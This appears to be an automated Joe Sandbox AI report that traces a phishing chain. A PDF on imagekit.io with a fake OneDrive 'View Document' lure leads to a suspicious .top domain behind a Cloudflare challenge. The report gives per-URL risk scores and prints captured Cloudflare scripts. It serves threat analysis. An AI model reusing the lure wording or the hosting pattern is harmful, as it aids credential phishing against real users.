URL: https://ik.imagekit.io Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://ik.imagekit.io |
URL: https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440 Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: file:///C:/Users/user/Downloads/downloaded.pdf Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "You've received a secured document via OneDrive; click below to access the document",
"prominent_button_name": "View Document",
"text_input_field_labels": "unknown",
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://ik.imagekit.io/nrof2h909/Paul%20W.%20Shaffer.pdf?updatedAt=1736369068440 Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: file:///C:/Users/user/Downloads/downloaded.pdf Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "You've received a secured document via OneDrive; click below to access the document",
"prominent_button_name": "View Document",
"text_input_field_labels": "unknown",
"pdf_icon_visible": true,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: file:///C:/Users/user/Downloads/downloaded.pdf Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: file:///C:/Users/user/Downloads/downloaded.pdf Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.to... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including the use of obfuscated code, data exfiltration, and redirects to a suspicious domain. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "jackoffjackofflilliilkillxoopoeadonline.top",cType: 'interactive',cRay: '8fef4ee5989c43ca',cH: '.j39N..SeP9l4XktPhpp0LU58WPiUcAzc6t32TvvVGY-1736372030-1.2.1.1-M1XPJsO4WaaUD_6dneqNXKgvNXsUyBEf9REoNqrkgX_aEKG6gJ33OUH4KmSv7usk',cUPMDTk: "\/drive?__cf_chl_tk=C3MofPGl033zLDMCQ23_3WSw7Ds6woLg8jv6NS0tZDA-1736372030-1.0.1.1-ezzCJff4OLIzEFvW4uW.mMJDHkff8fvKs8K5THw4ZXs",cFPWv: 'g',cITimeS: '1736372030',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/drive?__cf_chl_f_tk=C3MofPGl033zLDMCQ23_3WSw7Ds6woLg8jv6NS0tZDA-1736372030-1.0.1.1-ezzCJff4OLIzEFvW4uW.mMJDHkff8fvKs8K5THw4ZXs",md: "yUZ.i31PP9gxRoSCtvcCs2kTDZnufiUs7LSF7baAUqg-1736372030-1.2.1.1-nPDQEFG6BeulPGciaetYf91awcfvHv9z1GdU6N2Ig59T6cQL8KF19QoenMPUMmM4rdxOrp1MYf1EMFawOn0zotpCbgnWqenAPZCUeu41KbH2Y85VKG5JL6B1Fj3iX1TYcaTB3klSiXSHB4TCzg.jG0F10bP1LmSeUKeeBc0HxSuojrl1uN0tOpVr9SVB0THW5DAkW0uzVihUSwR3rHPA_eLEs6ACuqhXmtTWhjTErA_g64.olpIOCrxfpP9UUWTLvLgct1DWtxbRFYAovRw51xvxcdVAFZ7raQsI14u9WFZ5w0r6CDg_pBeiHqbeTEvolPu6CCWjVqpEdlV4e4uH900DKTzHIb60uGdOHyvFv3rbiR4vvBjh7YEQlP1gsAfTk.494LQnYngjsISKIfo_I9sNaVFUy0.G828HKqNq_bXf_ytpqLVJ2WZ4hDktno3Y.V7jPdg62KJGPsuMBqOS3HM7okwGkazbhTWzjzrG1_KtxXbLQ1wkVNQ4F2UkhaM.6aqpduFqcf8cbaJOHE96MDcT679LmOGTEUScpKudNSyRptOSydSCBxDUJIgj_wi5zROwhuuyWXa1EdIOt77DdxSKF6TYHeqlCLFbmmRRdQXqyOeDdCf6urk6ljn__JJQ3PEIdMGSHYMHS_HTnDrBgQXd2BS9Z48WwbUGYupJn9KnaZbgbRDt69MSZ8V2_g1MaGN9VK.YXBN.d6Di2ernUPI4uamWOoOHNC5J4G84HSk9Oh2sCd7aGl7hef8qJQ7qkBa.sWStAtOaLjJuRt4JdJfVyLOykEZGqGa3zW.AqjUPYIkXglt.L4fvXdzXglImnGozAwrePO_Tynx6PTrbi01523dRfOacZfb9KJF.PrLlTMQTaDIZpARE3DFh1WFFXvyC9brgeXgpzaWG2wVz2LfhxH.63VeSsJVmcJCoZrMARtEccn8vOdbyPwerKuJmsxGUNGaHTEvvXNtZXznPvQ6ONsuh2OvZ8Z_QfeBFWrY7adNzNP8K98ZfnTXWDSxYJ60fqJeeErLWlAUBgbsixhWpG5dWzh8VJB9SfNkkzbhJ8PJjLUbvtp0GPwpT1v1sG14yNa.opjNSEYkWnQZHo_uxUfUCOzwLCxpbdEjC5BMUNgONBmGo89hDNDx0eRuxKKJC6YJOCfGXIxk7SxmB.TwunZ42KVp7jYRwfKlm7.nk4GjaY5JjlTcgj5lIhW3Nr0EFBpJlqUSCmc.XlFSe96a6J_loW1tpFH5n7_TytMZe1hZqn_ijv9cAAJfvEY
Qj0xLrGGLNaBFdD7t3nZsFAUS0vvLWpjuXIit__pRO147vlJCkvM8K98MLd7NL1u5f0k7Ma4wZr5qwNU3uAeQ5FbwPMVV7Uu8CwqmdzSmKKGI0CjrGmx_JhSCdVbJcbIu834he3j24oLCvh8JRsTdKSRz7z11v3nIhuyNVW0nN3nmGe011pzLxSISazgiGiWvUOQYrqMeWCIWzcABWf88mxdhQrF97iZjPS.wroaW9.GF_9z25aVwTm3gj0Sd_xlw6CzHyV01j3u9N.PiI5v4sfPw8fQhb0eDHsEuA0ZA1terzFZPGffq.5xkCYeo7lhGTFBHSVJsuk3.RiXgHLcpuZEPVMJHg2T5rQsi.GFwj6KQxHRFitW.z.BJxvbDvQtrH9csMNL63oQb85NQr9mXLJeOocZbSHYzbjJHUHcnSREx3SwMl7qzJgJlEOA0C2vMSw.1WMRK7Ee5f.504VvEYcm4GdtyPTgKWG_jZCTy_SHFqUNCqlBMQN7u1lCW7Oh8RCtc7tA92fcEbN6TXwNoNpsK6rj4YnxJsvFArLWDka2zgXw5md5hPEG7.Ixt1QnpPLtAXvg8VAy4J9j92vGpR1RyzTqcOXLuKshNiryMRnxFr7AHEPqseQ2_k71f6_7uMXotiVE.2Qq.WEI1QOLgIxA",mdrd: "UzESROZqX84ZvBm86RGgeJMa7Inw_2lIPwz4QYZ30Sk-1736372030-1.2.1.1-VkI8cmXMO3nNZn_piT4YR4WtpxKXxodCuY2M.I0MWaJwB9__OaUEgfeNA673hOg.wJraovi.sCMDuJuHcM9TrN9iPTI76KQ1bPpXCSHjLS4sugNaDISQNWismCae3sTtE4xayRPWS9.d_3aYvwWF9N_UssTGkVvJ_2HwjzMgsKkB1Lky.ZwPoB7OLRXFIcQM5xR4Zittqvl40SEsvp2k05ZNYTpEHbky4UcI5IjlLFEV2eOj.GS4Rbzgt10sHUg1QEooOal_cVjTP1E3sqWVCl2c3aQanfXIRvNQOONUGuARb.o2K.cpFjN9Yb_xRwMuKGBv.TvN0omg5dCW684284rQ8yZXu3pU0NjGZBf_9StD3xqbVFPnco9Nk0BbuIGOT.GfQMNTlLCduBNVCCnwZ_kT_dZOxNFh5QNY9tpWy89N07AtJ2RrEf9VF_21.wpQMQWHTEYwxQDzUPvv_Qp_YVFeNBIcoa..j9mmoueto1rOO5qmDp_SUKWi3hL1erPpgh5Xl53h9Xbs.a2Hhz3Kof3pYui7cq7mSlBUDSTkFbejqH4usKvRxrjAIQqQvUE8sEsQJBCN4mm38tqmoR_mfK.BqP1P1MX_uZtGTA6sooujYlKA0uLFHazxiLilXOubvxnifhNJ.apGPUNVZkaSAU9VUWPNCUjqcBdh4hmW.lKBXHw5OB2Wc1NWiUFGqE1zMZN8DS.bP6Z7lVoEMPEvUnT6wjYtZgsr8jy_rirF0aGReWMFNBc9YnxHcbPSCVJmwxFDDP_dh6c6PcLnaMyZ8ZP6Q.qOpVOwMIxmS_gWnrOZI2aMlJ9238r5s.w5sF.ExFK6n8jzZPLlmG_._tA2_5Q8IMTGsB6qSTeOmwTJmrQxEqshOcyLidUMyOA43d90ywqJfvF1iO4rQwSUnqSselY56nZvj85.u0QR3sEaYptt4czJMsg0IadeoZ7BPqKU6TV6aGnPg.FsnrYC.bZifAzsYO3aQQZpkmZypuZzlO358mZ7ekwZdPCVs9YrbcJxiGLaHLATLNAuqAxKp1GVD5aBoZsL_3AvIttOeXX1EYyX6WC9OYjej.37ZaCp7i7LQGhIKa_eJHaOG1A.2u7WOcAZeTaSwrCYenhV_RYJMgT1_yrQ4cu2qS12f9lPffUf9f0NQ2ymVEoCboXek6pVuXYa7BwEqwKYpqB3xOxmLHqsrH3e4ik6B3stEYKCCsIIJTvygMiYsl_A.OqMeGrE.VpccBmOMDLfko6yzsgqUF.1X29r
7QBy |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. While the script contains some obfuscated code and makes use of various Cloudflare-specific APIs, it does not exhibit any clear signs of malicious behavior. However, the extensive use of obfuscation and the presence of some potentially sensitive information (e.g., API keys) warrant a medium-risk score for further review."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'a3umx',
chlApiSitekey: '0x4AAAAAAAAjq6WYeRDKmebM',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'F_cHXGIYTEVgqdFeoOyOTQTQCs40h.tCMS7tZ6.J0_w-1736372032-1.3.1.1-nrQWGTJbmKvw2FXRtiUH50nb2KrQaivsOoNrSqW.lkY',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8fef4ef4eb8e4376',
cH: 'sL7K.YIifBS09aNXZvPva1qg5TiGP7M8D7lRdOwb8ug-1736372032-1.1.1.1-bxfIBmGkvK4Xvn2QkJhirbMWphyuLod3pHLvgHxZNK.vcA.hFaWUpYotFvSZ08E_',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'zxKabkTEoUYWxUTNv46kgySYkvMk4LDi3AvOcF8ATX0-1736372032-1.1.1.1-tr4Ou0e0dJWR7IPHlDsLS09OQOtbHl.63sDzzfc0sUIASphsyzcgAb.RbY89U7rZ0IZkux.e2pDMtKWnd2DDzfPXBENm7kTe9SOr9Ml7l5_d4WwgLumRvTPtspihkfMtLz.UL4vaZ0kqYbsCGUPbyz2u8FhfMr1L8ZZtdDehNldosTv6to4_0Vre1HwrqZDqm1MKX.DHcM1xgBnwpASatSmW3x.cFo3ZnPp7G3gbZLYvjK8WwWBz6D.ZxYi0fby.upAmm6gd10kMFkY33Iy9Lxydq7hfNhsTf9yLlR47q4iBqF9zY3rfNKQErkjc9CTCMhjCh5R8VHd2FlBZCgNwfsiBu5DZI0Hy23kA1zWo8KrEUxxABjh3tHKv.ixga9PVv1qZnh6C_Rs0_USVEjxwmSW06GD2xchRyIbJGrfvWhY0wPi7AQJpQLhGOnrc40oCjPTg7Y70XcigoI6bMD_b0ULehdiR5HgspDWfK0LMRnXSuGoQXlXW3hJaFXIKGwcgsvLjgGkHAYwDa4k4686EWTzmk52ZGqqVhR3aUxVzIlB_.KzCT6BHJ9C7zd5fL3659sNmHwdykJj_r_.Nw3i_q_7yu9rwCv.FEQxoVlNOUl6NlcVkdMTEVLlDGdoCcC_81r2uVoBMlOwx3euK41X1X9hzA9TgQ7YKH60VfWgGwCJglN.Dm4lIiIvMCUPAzskwSvBh6WdJOA8X55Rn7iH2XHejI9uh8dQszA3
|
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This script appears to be related to Cloudflare's security challenge system, which is a legitimate service used to protect websites from abuse. The script sets up configuration options and translations for the Cloudflare challenge, which is a common practice for websites that utilize Cloudflare's services. There are no indicators of malicious behavior, and the script seems to be serving a legitimate purpose."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F"},"translations":{"check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_overrun_description":"Stuck%20here%3F","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only":"Testing%20only.","turnstile_footer_privacy":"Privacy","turnstile_feedback_description":"Send%20Feedback","turnstile_feedback_report":"Having%20trouble%3F","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_verifying":"Verifying...","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","human_button_text":"Verify%20you%20are%20human","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_expired":"Expired","turnstile_refresh":"Refresh","turnstile_footer_terms":"Terms","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_failure":"Error","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%
22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_timeout":"Timed%20out","turnstile_success":"Success%21"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eV,f4,f5,fx,fA,fC,fD,fE,fQ,g2,g8,g9,ga,gk,gv,gz,gA,gB,gF,gG,gH,f2,f3){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(566))/1*(parseInt(gI(1498))/2)+parseInt(gI(1206))/3+parseInt(gI(539))/4+parseInt(gI(1918))/5+parseInt(gI(1814))/6*(-parseInt(gI(808))/7)+parseInt(gI(627))/8*(-parseInt(gI(1022))/9)+parseInt(gI(1338))/10*(-parseInt(gI(1755))/11),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,533562),eM=this||self,eN=eM[gJ(1227)],eO=function(gK,d,e,f,g){return gK=gJ,d={'zuzMA':function(h,i){return h(i)},'GwkdB':function(h,i){return h*i},'RpJUy':function(h,i){return h^i},'pycSI':function(h,i){return h^i},'blJPX':function(h,i){return i^h},'nHPHK':function(h,i){return h^i},'OjBKt':function(h,i){return h+i},'YKiqI':function(h,i){return i===h},'bCAEb':function(h,i){return h<i},'iQHYZ':function(h,i){return h+i},'aUMxQ':function(h,i){return h>i},'RYUee':function(h,i){return h>i},'xaVFW':function(h,i){return i&h},'QlRIe':function(h,i){return i==h},'NRGdT':function(h,i){return h-i},'WeCub':function(h,i){return h<<i},'lGPtO':function(h,i){return h<<i},'YLuQT':function(h,i){return h-i},'Txpkb':function(h,i){return i|h},'pDWNw':function(h,i){return h(i)},'mLgQX':function(h,i){return h!==i},'MgBKi':function(h,i){return h==i},'fKmLM':function(h,i){return h-i},'djlGl':function(h,i){return h|i},'dtCmC':function(h,i){return h-i},'CTpig':function(h,i){return h<i},'hFHRr':function(h,i){return h|i},'XqCzB':function(h,i){return h-i},'QxbqW':function(h,i){return i!=h},'hbshX':function(h,i){return i&h},'dLpoY':function(h,i){return i==h},'eFPcs':function(h,i){return 
h*i},'dJXHm':function(h,i){ |
URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate security mechanism used to protect websites from abuse. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles communication between the challenge widget and the parent window, which is a common pattern for Cloudflare's challenge system. While the script uses some legacy practices like `XDomainRequest`, these are not inherently malicious and are likely used for compatibility reasons. Overall, the script seems to be a benign implementation of Cloudflare's challenge functionality."
} |
// Analyst note: captured inline script from the challenge iframe served by
// challenges.cloudflare.com. It only (1) publishes a configuration object on
// window._cf_chl_opt and (2) registers a postMessage listener; no network
// request is issued by the code visible here.
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'a3umx',
// NOTE(review): presumably the public widget site key of the embedding page,
// not a secret credential; confirm before treating it as a leaked API key.
chlApiSitekey: '0x4AAAAAAAAjq6WYeRDKmebM',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'F_cHXGIYTEVgqdFeoOyOTQTQCs40h.tCMS7tZ6.J0_w-1736372032-1.3.1.1-nrQWGTJbmKvw2FXRtiUH50nb2KrQaivsOoNrSqW.lkY',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
// cRay differs per request; useful for correlating this capture with proxy logs.
cRay: '8fef4ef4eb8e4376',
cH: 'sL7K.YIifBS09aNXZvPva1qg5TiGP7M8D7lRdOwb8ug-1736372032-1.1.1.1-bxfIBmGkvK4Xvn2QkJhirbMWphyuLod3pHLvgHxZNK.vcA.hFaWUpYotFvSZ08E_',
cFPWv: 'g',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
// Opaque per-session token; its '-1736372032-' segment matches cITimeS below.
md: 'zxKabkTEoUYWxUTNv46kgySYkvMk4LDi3AvOcF8ATX0-1736372032-1.1.1.1-tr4Ou0e0dJWR7IPHlDsLS09OQOtbHl.63sDzzfc0sUIASphsyzcgAb.RbY89U7rZ0IZkux.e2pDMtKWnd2DDzfPXBENm7kTe9SOr9Ml7l5_d4WwgLumRvTPtspihkfMtLz.UL4vaZ0kqYbsCGUPbyz2u8FhfMr1L8ZZtdDehNldosTv6to4_0Vre1HwrqZDqm1MKX.DHcM1xgBnwpASatSmW3x.cFo3ZnPp7G3gbZLYvjK8WwWBz6D.ZxYi0fby.upAmm6gd10kMFkY33Iy9Lxydq7hfNhsTf9yLlR47q4iBqF9zY3rfNKQErkjc9CTCMhjCh5R8VHd2FlBZCgNwfsiBu5DZI0Hy23kA1zWo8KrEUxxABjh3tHKv.ixga9PVv1qZnh6C_Rs0_USVEjxwmSW06GD2xchRyIbJGrfvWhY0wPi7AQJpQLhGOnrc40oCjPTg7Y70XcigoI6bMD_b0ULehdiR5HgspDWfK0LMRnXSuGoQXlXW3hJaFXIKGwcgsvLjgGkHAYwDa4k4686EWTzmk52ZGqqVhR3aUxVzIlB_.KzCT6BHJ9C7zd5fL3659sNmHwdykJj_r_.Nw3i_q_7yu9rwCv.FEQxoVlNOUl6NlcVkdMTEVLlDGdoCcC_81r2uVoBMlOwx3euK41X1X9hzA9TgQ7YKH60VfWgGwCJglN.Dm4lIiIvMCUPAzskwSvBh6WdJOA8X55Rn7iH2XHejI9uh8dQszA3cu6NxsdzfuZ6jJb9rHxIFutPOyh5JgCRvNCX8zddbRTUl7N8QDNVr0oa3f3mq_eg5KwukL_2jVHKHOTmeLV_pk4nsUzDgSg9A_nThyLXNGY8Tu6pWyaqcI3yioh25OJ7X6QuWHNg4MqiyzW2uwFAcU1yJu9Km5018ORZBdu6YyXl2_BExcrMMb4lALUWz8aS9_kS8oLS2FVWownBed6_C9IzLsOQWpPuoLbkxgHOHXQmlvziOJeIwijRhGjDBZl8SqDjgNU83o.ps9vGjLva7sJAJJTL.6RpTNFQ0gHS34YQ.osV6mh.bWRjS8G1ROCQoCHjt0T_MRDjNRgH9XNTzfBg_94NEYVzdZ4LdYo7LXGbxtBHwKAAyhVrk.pIaVD_cV3ugRYXJZIGf_P_Z6NN_MnYPIkWxpEtyO6B1VEahNVV0g6tco_zljolRX3Gi35DAqy0C9A0ARqMiKVXLda.9sTxYW8w_PwUQKKnzVF1sw7TzYAd7tFLIcdCk5eu2QCtQWQHtMLVMAbTURhDuc4o_2AjumOy6OTnAFe_rC_4yGjswOGwwe.kDfhMJmcUXWtdGZM_m6x54hiRX5GufC2srrE9xCcgTNBnSjjhSm4z59Ahln6524M.CT4xLekPSR2hU3KZ_3Yg',
cITimeS: '1736372032',
// refresh(): asks the embedding page to reload the widget. The message is
// posted with targetOrigin "*", so any parent frame would receive it.
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'a3umx',
nextRcV: 'F_cHXGIYTEVgqdFeoOyOTQTQCs40h.tCMS7tZ6.J0_w-1736372032-1.3.1.1-nrQWGTJbmKvw2FXRtiUH50nb2KrQaivsOoNrSqW.lkY',
event: 'reloadRequest',
}, "*");
}
}
};
// Liveness ping: a 'meow' message carrying this widget's id is answered with a
// 'food' message that echoes the received seq value.
var handler = function(event) {
var e = event.data;
// NOTE(review): the filter inspects fields of event.data only; event.origin is
// not compared, so the sender is not authenticated. The reply carries only the
// widget id and the echoed seq.
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.top/drive Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying you are human. This may take a few seconds.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.top/drive Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.top Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://jackoffjackofflilliilkillxoopoeadonline.top |
URL: https://jackoffjackofflilliilkillxoopoeadonline.top/drive Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
URL: https://jackoffjackofflilliilkillxoopoeadonline.top/drive Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: https://challenges.cloudflare.com/turnstile/v0/g/8... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The script contains obfuscated code, which is a high-risk indicator. However, there are no clear signs of malicious behavior such as data exfiltration or dynamic code execution. The obfuscation could be for legitimate purposes, such as protecting intellectual property, but it warrants further review to ensure there is no hidden malicious intent."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return 
o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. 
Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: https://jackoffjackofflilliilkillxoopoeadonline.to... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including data exfiltration, obfuscated code, and redirects to potentially malicious domains. The script appears to be collecting sensitive user information and sending it to an external server, which is a clear indication of malicious intent. Additionally, the use of heavily obfuscated code and the presence of suspicious domain interactions further increase the risk score. Overall, this script demonstrates a high level of risk and should be treated with caution."
} |
